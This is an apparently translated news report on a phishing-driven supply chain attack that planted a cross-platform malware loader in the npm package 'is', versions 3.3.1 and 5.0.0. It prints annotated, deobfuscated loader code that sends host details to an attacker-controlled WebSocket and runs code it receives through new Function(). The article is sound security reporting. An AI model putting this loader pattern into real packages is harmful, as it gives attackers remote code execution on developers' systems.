Popular JavaScript package is: Malware through supply chain attack

Following a phishing attack on an npm maintainer, the package is, which is downloaded around 2.7 million times a week, was infected with a malware loader.

Malware warning and code (Image: solarseven/Shutterstock.com)

A software supply chain attack has hit the popular JavaScript package is, which has almost 2.7 million downloads per week.

Maintainer Jordan Harband writes on Bluesky that attackers had taken over the account of another project manager. Versions 3.3.1 and 5.0.0 of the package are affected.


Both versions were apparently only in circulation for a few hours. Version 3.3.2 is now available on the npm site, which does not contain any malicious code. As a transition, Harband had declared the newer releases deprecated and marked 3.3.0 as the last active version so that processes that automatically request the latest version of a JavaScript package from npm do not continue to download the malicious code.


The is package is a testing library that checks, among other things, whether a value is defined (is.defined), empty (is.empty) or of a specific type (generally via is.type(value, type) or specifically via is.integer, is.bool, is.array, etc.).


The attack apparently comes from the same group that previously hit numerous npm maintainers with a phishing attack and had already planted malicious code in the packages eslint-config-prettier, eslint-plugin-prettier, synckit@0.11.9, @pkgr/core, napi-postinstall and got-fetch.

The attack on those other packages targeted only Windows, using a DLL. A blog article on Invoke RE describes the Scavenger malware found in the eslint-config-prettier package in more detail.

The malware loader in the is package, on the other hand, strikes cross-platform on Windows, macOS, and Linux.

A blog post by the security software company Socket describes how the obfuscated JavaScript code works. The loader creates the payload completely in the memory of the affected system and creates the decoded malicious code as a separate function using new Function().

This function then queries numerous details, such as the host name, operating system, CPU details, and environment variables from process.env. Finally, it uses the ws library to establish a WebSocket connection and transfer the data.

Socket's security team has added comments describing what each part of the deobfuscated malicious code does:

// Expose Node's `require`, even in restricted contexts (e.g., Electron)
get "switch"() { return require; }

// Load system and networking modules dynamically
const os = this["switch"]("os");
const WS = this["switch"]("ws");

// Connect to threat actor-controlled WebSocket endpoint
const sock = new WS("wss://<decoded-at-runtime-endpoint>");

// Send host fingerprinting data on connect
sock.onopen = () => sock.send(JSON.stringify({
  host: os.hostname(),
  plat: os.platform(),
  cwd : process.cwd()
}));

// Execute threat actor-supplied code received over the socket
sock.onmessage = ({ data }) => {
  new Function(data)();  // remote code execution
};

The last section shows that the malicious code turns the WebSocket connection into a remote shell: it executes the received JavaScript directly via new Function(). The executed code runs with the same rights as the host process, so it usually has direct access to the file system and the network.

Anyone integrating the library should ensure that none of the infected variants have reached the computer. It can also be assumed that the attacker group had or has other JavaScript maintainers in its sights.

(rme)


This article was originally published in German. It was translated with technical assistance and editorially reviewed before publication.